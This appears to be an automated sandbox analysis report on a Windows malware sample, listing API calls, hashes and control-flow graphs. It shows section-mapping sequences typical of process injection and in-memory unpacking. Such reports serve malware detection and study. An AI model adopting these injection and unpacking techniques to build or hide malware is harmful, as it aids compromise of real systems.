                                                            Start time:09:24:56
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:timeout /t 10
                                                            Imagebase:0x320000
                                                            File size:25'088 bytes
                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:8.6%
                                                              Dynamic/Decrypted Code Coverage:17.6%
                                                              Signature Coverage:40.6%
                                                              Total number of Nodes:165
                                                              Total number of Limit Nodes:7
                                                              execution_graph 4005 402e20 4006 402dd5 4005->4006 4008 402e24 4005->4008 4007 4019e3 15 API calls 4009 403029 4007->4009 4008->4007 4008->4009 4010 401620 4011 401626 4010->4011 4012 4016c6 NtDuplicateObject 4011->4012 4021 4017e2 4011->4021 4013 4016e3 NtCreateSection 4012->4013 4012->4021 4014 401763 NtCreateSection 4013->4014 4015 401709 NtMapViewOfSection 4013->4015 4017 40178f 4014->4017 4014->4021 4015->4014 4016 40172c NtMapViewOfSection 4015->4016 4016->4014 4018 40174a 4016->4018 4019 401799 NtMapViewOfSection 4017->4019 4017->4021 4018->4014 4020 4017c0 NtMapViewOfSection 4019->4020 4019->4021 4020->4021 3986 40b407 3988 40b413 3986->3988 3987 40b41b __commit 3988->3987 3989 40b491 FlushFileBuffers 3988->3989 3989->3987 3990 40b49d GetLastError 3989->3990 3990->3987 4046 40b4e8 CreateFileA 4085 40b38b 4086 40b397 4085->4086 4088 40b3ab 4086->4088 4089 40b314 4086->4089 4090 40b328 4089->4090 4091 40b344 __freebuf 4089->4091 4090->4088 4091->4090 4093 40b808 4091->4093 4094 40b814 4093->4094 4095 40b81c __close 4094->4095 4097 40b76c 4094->4097 4095->4090 4098 40b77c 4097->4098 4099 40b7d2 4098->4099 4100 40b7c8 GetLastError 4098->4100 4099->4095 4100->4099 3844 2155999 3847 21559aa 3844->3847 3848 21559b9 3847->3848 3851 215614a 3848->3851 3857 2156165 3851->3857 3852 215616e CreateToolhelp32Snapshot 3853 215618a Module32First 3852->3853 3852->3857 3854 21559a9 3853->3854 3855 2156199 3853->3855 3858 2155e09 3855->3858 3857->3852 3857->3853 3859 2155e34 3858->3859 3860 2155e45 VirtualAlloc 3859->3860 3861 2155e7d 3859->3861 3860->3861 3861->3861 3948 211003c 3949 2110049 3948->3949 3961 2110e0f SetErrorMode SetErrorMode 3949->3961 3954 2110265 3955 21102ce VirtualProtect 3954->3955 3957 211030b 3955->3957 3956 2110439 VirtualFree 3959 21104be LoadLibraryA 3956->3959 3957->3956 3960 21108c7 3959->3960 3962 2110223 3961->3962 3963 2110d90 3962->3963 3964 2110dad 3963->3964 3965 2110dbb GetPEB 3964->3965 3966 2110238 VirtualAlloc 3964->3966 3965->3966 3966->3954 4071 4019ee 4072 4019f8 4071->4072 4073 401a2b Sleep 4072->4073 4074 401524 7 API calls 4073->4074 4075 401a46 4074->4075 4076 401615 7 API calls 4075->4076 4077 401a57 4075->4077 4076->4077 4059 402f74 4060 402f7e 4059->4060 4061 4019e3 15 API calls 4060->4061 4062 403029 4060->4062 4061->4062 4069 40b534 GetLocaleInfoA 4070 40b562 4069->4070 4047 40b0f9 4048 40b105 4047->4048 4050 40b29f 4048->4050 4053 40b10c 4048->4053 4057 40b13a _realloc 4048->4057 4049 40b2a4 RtlReAllocateHeap 4049->4050 4049->4053 4050->4049 4051 40b268 4050->4051 4050->4053 4058 40b285 4050->4058 4051->4053 4056 40b272 GetLastError 4051->4056 4052 40b2ff GetLastError 4052->4053 4054 40b1c5 RtlAllocateHeap 4054->4057 4055 40b21a RtlReAllocateHeap 4055->4057 4056->4053 4057->4051 4057->4053 4057->4054 4057->4055 4057->4058 4058->4052 4058->4053 4063 211092b GetPEB 4064 2110972 4063->4064 3862 402f9c 3864 402f8f 3862->3864 3863 403029 3864->3863 3866 4019e3 3864->3866 3867 4019f3 3866->3867 3868 401a2b Sleep 3867->3868 3873 401524 3868->3873 3870 401a46 3872 401a57 3870->3872 3885 401615 3870->3885 3872->3863 3874 401533 3873->3874 3875 4016c6 NtDuplicateObject 3874->3875 3884 4015cd 3874->3884 3876 4016e3 NtCreateSection 3875->3876 3875->3884 3877 401763 NtCreateSection 3876->3877 3878 401709 NtMapViewOfSection 3876->3878 3880 40178f 3877->3880 3877->3884 3878->3877 3879 40172c NtMapViewOfSection 3878->3879 3879->3877 3881 40174a 3879->3881 3882 401799 NtMapViewOfSection 3880->3882 3880->3884 3881->3877 3883 4017c0 NtMapViewOfSection 3882->3883 3882->3884 3883->3884 3884->3870 3886 401626 3885->3886 3887 4016c6 NtDuplicateObject 3886->3887 3896 4017e2 3886->3896 3888 4016e3 NtCreateSection 3887->3888 3887->3896 3889 401763 NtCreateSection 3888->3889 3890 401709 NtMapViewOfSection 3888->3890 3892 40178f 3889->3892 3889->3896 3890->3889 3891 40172c NtMapViewOfSection 3890->3891 3891->3889 3893 40174a 3891->3893 3894 401799 NtMapViewOfSection 3892->3894 3892->3896 3893->3889 3895 4017c0 NtMapViewOfSection 3894->3895 3894->3896 3895->3896 3896->3872 3897 40c05d 3902 40bd58 3897->3902 3899 40c075 3900 40c0a6 3899->3900 3901 40c08b SetLastError GetConsoleAliasesA 3899->3901 3900->3900 3901->3899 3903 40bd71 3902->3903 3904 40bdcc LocalReAlloc 3903->3904 3905 40bdde 3903->3905 3904->3903 3906 40bdeb 8 API calls 3905->3906 3907 40bebd 3905->3907 3910 40beb3 3906->3910 3908 40bf75 3907->3908 3909 40becd 6 API calls 3907->3909 3924 40ba54 GetModuleHandleW GetProcAddress 3908->3924 3913 40bf1f 3909->3913 3910->3907 3913->3908 3918 40bfdc 3931 40bcec 3918->3931 3920 40bfe1 3921 40c025 EnumTimeFormatsW 3920->3921 3922 40c044 GetProcessHeaps 3920->3922 3923 40c04f 3920->3923 3921->3920 3922->3920 3923->3899 3925 40ba7a LoadLibraryA 3924->3925 3926 40baa9 3925->3926 3927 40bae8 3926->3927 3928 40baf4 GetModuleHandleW GetProcAddress 3927->3928 3929 40bbca 3927->3929 3928->3927 3930 40ba8b VirtualProtect 3929->3930 3930->3918 3938 40bbef 3931->3938 3934 40bd22 GetConsoleAliasesLengthA FreeEnvironmentStringsA GetShortPathNameW 3935 40bd43 3934->3935 3943 40bc36 3935->3943 3939 40bc01 SetConsoleTitleW 3938->3939 3940 40bc0c 3938->3940 3939->3940 3941 40bc20 BuildCommDCBW 3940->3941 3942 40bc2c 3940->3942 3941->3942 3942->3934 3942->3935 3944 40bc58 UnhandledExceptionFilter 3943->3944 3945 40bc5f 3943->3945 3944->3945 3946 40bcc8 3945->3946 3947 40bc9e SetDefaultCommConfigA SetCalendarInfoA SleepEx 3945->3947 3946->3920 3947->3945 4065 40b57d 4066 40b647 4065->4066 4067 40b5bd ___convertcp 4065->4067 4067->4066 4068 40b69b WideCharToMultiByte 4067->4068 4068->4066

                                                              Executed Functions

                                                              Function 0040BD58 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 216memorytimelibraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000000), ref: 0040BDCF
                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 0040BDF4
                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 0040BE01
                                                              • InitAtomTable.KERNEL32(00000000), ref: 0040BE08
                                                              • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0040BE49
                                                              • ReadFileScatter.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0040BE6C
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040BE7B
                                                              • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BE85
                                                              • RtlInterlockedPopEntrySList.NTDLL(?), ref: 0040BE9E
                                                              • FileTimeToSystemTime.KERNEL32(00000000,00000000), ref: 0040BEDB
                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BEE5
                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0040BEED
                                                              • GetFileAttributesW.KERNEL32(00423138), ref: 0040BEF8
                                                              • CompareStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040BF0A
                                                              • ActivateActCtx.KERNEL32(00000000,00000000), ref: 0040BF12
                                                                • Part of subcall function 0040BA54: GetModuleHandleW.KERNEL32(0042310C,0040BF7A), ref: 0040BA59
                                                                • Part of subcall function 0040BA54: GetProcAddress.KERNEL32(00000000,00423128), ref: 0040BA65
                                                              • LoadLibraryA.KERNELBASE(004231E4), ref: 0040BFCC
                                                              • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0040C028
                                                              • GetProcessHeaps.KERNEL32(00000000,00000000), ref: 0040C046
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: File$Time$ConsoleInterlockedModule$ActivateAddressAllocAtomAttributesCalendarCompareCriticalDeleteEntryEnumExceptionExchangeFormatsHandleHeapsInfoInitLibraryListLoadLocalModeNameOutputProcProcessRaiseReadScatterSectionStringSystemTableWrite
                                                              • String ID: k`$tl_$}$
                                                              • API String ID: 2790545399-211918992
                                                              • Opcode ID: 62ebdbc1345a9830f6c3b71613122af7ca7e2f41f5a114459fff0b3f35dfb333
                                                              • Instruction ID: 983014b9c3dec96d1e327b941389972c90706ee8dc4b42e0b9954b56a4e297c8
                                                              • Opcode Fuzzy Hash: 62ebdbc1345a9830f6c3b71613122af7ca7e2f41f5a114459fff0b3f35dfb333
                                                              • Instruction Fuzzy Hash: 817172B5900218AED720AFB5DD84D6B76BCFB08348F00547AF549F2166DB388D45CFA8
                                                              Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 139 401524-401556 146 401563-40156c call 4012a9 139->146 151 401593-40159b 146->151 152 40156e-401580 146->152 153 40159d-4015a0 151->153 154 401582-401589 152->154 155 4015fd-401612 152->155 156 4015a2-4015a4 153->156 157 4015e9-4015ef 153->157 158 401560 154->158 159 40158b-40158d 154->159 160 4015a6-4015c7 156->160 161 4015f7 156->161 157->161 158->146 162 401590-401592 159->162 163 401643-401670 call 4012a9 160->163 164 4015c9 160->164 161->155 162->151 174 401672 163->174 175 401675-40167a 163->175 164->162 165 4015cb 164->165 165->153 167 4015cd 165->167 167->157 174->175 177 401680-401691 175->177 178 401991-401999 175->178 182 401697-4016c0 177->182 183 40198f 177->183 178->175 181 40199e-4019e0 call 4012a9 178->181 182->183 191 4016c6-4016dd NtDuplicateObject 182->191 183->181 191->183 193 4016e3-401707 NtCreateSection 191->193 195 401763-401789 NtCreateSection 193->195 196 401709-40172a NtMapViewOfSection 193->196 195->183 198 40178f-401793 195->198 196->195 197 40172c-401748 NtMapViewOfSection 196->197 197->195 200 40174a-401760 197->200 198->183 201 401799-4017ba NtMapViewOfSection 198->201 200->195 201->183 203 4017c0-4017dc NtMapViewOfSection 201->203 203->183 206 4017e2 call 4017e7 203->206
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                              • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                              • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                              • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65
                                                              Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 209 401615-401632 213 401643 209->213 214 401639-401670 call 4012a9 209->214 213->214 221 401672 214->221 222 401675-40167a 214->222 221->222 224 401680-401691 222->224 225 401991-401999 222->225 229 401697-4016c0 224->229 230 40198f 224->230 225->222 228 40199e-4019e0 call 4012a9 225->228 229->230 238 4016c6-4016dd NtDuplicateObject 229->238 230->228 238->230 240 4016e3-401707 NtCreateSection 238->240 242 401763-401789 NtCreateSection 240->242 243 401709-40172a NtMapViewOfSection 240->243 242->230 245 40178f-401793 242->245 243->242 244 40172c-401748 NtMapViewOfSection 243->244 244->242 247 40174a-401760 244->247 245->230 248 401799-4017ba NtMapViewOfSection 245->248 247->242 248->230 250 4017c0-4017dc NtMapViewOfSection 248->250 250->230 253 4017e2 call 4017e7 250->253
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                              • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                              • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                              • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65
                                                              Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 256 401635-401670 call 4012a9 264 401672 256->264 265 401675-40167a 256->265 264->265 267 401680-401691 265->267 268 401991-401999 265->268 272 401697-4016c0 267->272 273 40198f 267->273 268->265 271 40199e-4019e0 call 4012a9 268->271 272->273 281 4016c6-4016dd NtDuplicateObject 272->281 273->271 281->273 283 4016e3-401707 NtCreateSection 281->283 285 401763-401789 NtCreateSection 283->285 286 401709-40172a NtMapViewOfSection 283->286 285->273 288 40178f-401793 285->288 286->285 287 40172c-401748 NtMapViewOfSection 286->287 287->285 290 40174a-401760 287->290 288->273 291 401799-4017ba NtMapViewOfSection 288->291 290->285 291->273 293 4017c0-4017dc NtMapViewOfSection 291->293 293->273 296 4017e2 call 4017e7 293->296
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectView
                                                              • String ID:
                                                              • API String ID: 1652636561-0
                                                              • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                              • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                              • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                              • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24
                                                              Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 299 40162d-401632 301 401643 299->301 302 401639-401670 call 4012a9 299->302 301->302 309 401672 302->309 310 401675-40167a 302->310 309->310 312 401680-401691 310->312 313 401991-401999 310->313 317 401697-4016c0 312->317 318 40198f 312->318 313->310 316 40199e-4019e0 call 4012a9 313->316 317->318 326 4016c6-4016dd NtDuplicateObject 317->326 318->316 326->318 328 4016e3-401707 NtCreateSection 326->328 330 401763-401789 NtCreateSection 328->330 331 401709-40172a NtMapViewOfSection 328->331 330->318 333 40178f-401793 330->333 331->330 332 40172c-401748 NtMapViewOfSection 331->332 332->330 335 40174a-401760 332->335 333->318 336 401799-4017ba NtMapViewOfSection 333->336 335->330 336->318 338 4017c0-4017dc NtMapViewOfSection 336->338 338->318 341 4017e2 call 4017e7 338->341
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                              • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                              • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                              • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24
                                                              Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 344 401620-401632 347 401643 344->347 348 401639-401670 call 4012a9 344->348 347->348 355 401672 348->355 356 401675-40167a 348->356 355->356 358 401680-401691 356->358 359 401991-401999 356->359 363 401697-4016c0 358->363 364 40198f 358->364 359->356 362 40199e-4019e0 call 4012a9 359->362 363->364 372 4016c6-4016dd NtDuplicateObject 363->372 364->362 372->364 374 4016e3-401707 NtCreateSection 372->374 376 401763-401789 NtCreateSection 374->376 377 401709-40172a NtMapViewOfSection 374->377 376->364 379 40178f-401793 376->379 377->376 378 40172c-401748 NtMapViewOfSection 377->378 378->376 381 40174a-401760 378->381 379->364 382 401799-4017ba NtMapViewOfSection 379->382 381->376 382->364 384 4017c0-4017dc NtMapViewOfSection 382->384 384->364 387 4017e2 call 4017e7 384->387
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                              • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                              • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                              • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24
                                                              Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 390 401658-401670 call 4012a9 394 401672 390->394 395 401675-40167a 390->395 394->395 397 401680-401691 395->397 398 401991-401999 395->398 402 401697-4016c0 397->402 403 40198f 397->403 398->395 401 40199e-4019e0 call 4012a9 398->401 402->403 411 4016c6-4016dd NtDuplicateObject 402->411 403->401 411->403 413 4016e3-401707 NtCreateSection 411->413 415 401763-401789 NtCreateSection 413->415 416 401709-40172a NtMapViewOfSection 413->416 415->403 418 40178f-401793 415->418 416->415 417 40172c-401748 NtMapViewOfSection 416->417 417->415 420 40174a-401760 417->420 418->403 421 401799-4017ba NtMapViewOfSection 418->421 420->415 421->403 423 4017c0-4017dc NtMapViewOfSection 421->423 423->403 426 4017e2 call 4017e7 423->426
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                              • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                              • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                              • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24
                                                              Function 0215614A Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 429 215614a-2156163 430 2156165-2156167 429->430 431 215616e-215617a CreateToolhelp32Snapshot 430->431 432 2156169 430->432 433 215617c-2156182 431->433 434 215618a-2156197 Module32First 431->434 432->431 433->434 441 2156184-2156188 433->441 435 21561a0-21561a8 434->435 436 2156199-215619a call 2155e09 434->436 439 215619f 436->439 439->435 441->430 441->434
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02156172
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02156192
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2153000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: d9671e0d641817e50329973655ecaf9c6b43b643ab2a7f2930f0bf897fbbd240
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: C0F0C236540324BFD7202AF4A8CCB7F72ECAF88628F5001A8EA52D14C0DB70E8054AA0
                                                              Function 0211003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 54 211003c-2110047 55 2110049 54->55 56 211004c-2110263 call 2110a3f call 2110e0f call 2110d90 VirtualAlloc 54->56 55->56 71 2110265-2110289 call 2110a69 56->71 72 211028b-2110292 56->72 77 21102ce-21103c2 VirtualProtect call 2110cce call 2110ce7 71->77 74 21102a1-21102b0 72->74 76 21102b2-21102cc 74->76 74->77 76->74 83 21103d1-21103e0 77->83 84 21103e2-2110437 call 2110ce7 83->84 85 2110439-21104b8 VirtualFree 83->85 84->83 87 21105f4-21105fe 85->87 88 21104be-21104cd 85->88 91 2110604-211060d 87->91 92 211077f-2110789 87->92 90 21104d3-21104dd 88->90 90->87 95 21104e3-2110505 90->95 91->92 93 2110613-2110637 91->93 96 21107a6-21107b0 92->96 97 211078b-21107a3 92->97 98 211063e-2110648 93->98 108 2110517-2110520 95->108 109 2110507-2110515 95->109 99 21107b6-21107cb 96->99 100 211086e-21108be LoadLibraryA 96->100 97->96 98->92 102 211064e-211065a 98->102 101 21107d2-21107d5 99->101 107 21108c7-21108f9 100->107 104 2110824-2110833 101->104 105 21107d7-21107e0 101->105 102->92 106 2110660-211066a 102->106 114 2110839-211083c 104->114 111 21107e2 105->111 112 21107e4-2110822 105->112 113 211067a-2110689 106->113 115 2110902-211091d 107->115 116 21108fb-2110901 107->116 110 2110526-2110547 108->110 109->110 117 211054d-2110550 110->117 111->104 112->101 118 2110750-211077a 113->118 119 211068f-21106b2 113->119 114->100 120 211083e-2110847 114->120 116->115 122 21105e0-21105ef 117->122 123 2110556-211056b 117->123 118->98 124 21106b4-21106ed 119->124 125 21106ef-21106fc 119->125 126 2110849 120->126 127 211084b-211086c 120->127 122->90 128 211056d 123->128 129 211056f-211057a 123->129 124->125 130 211074b 125->130 131 21106fe-2110748 125->131 126->100 127->114 128->122 132 211059b-21105bb 129->132 133 211057c-2110599 129->133 130->113 131->130 138 21105bd-21105db 132->138 133->138 138->117
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0211024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2110000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
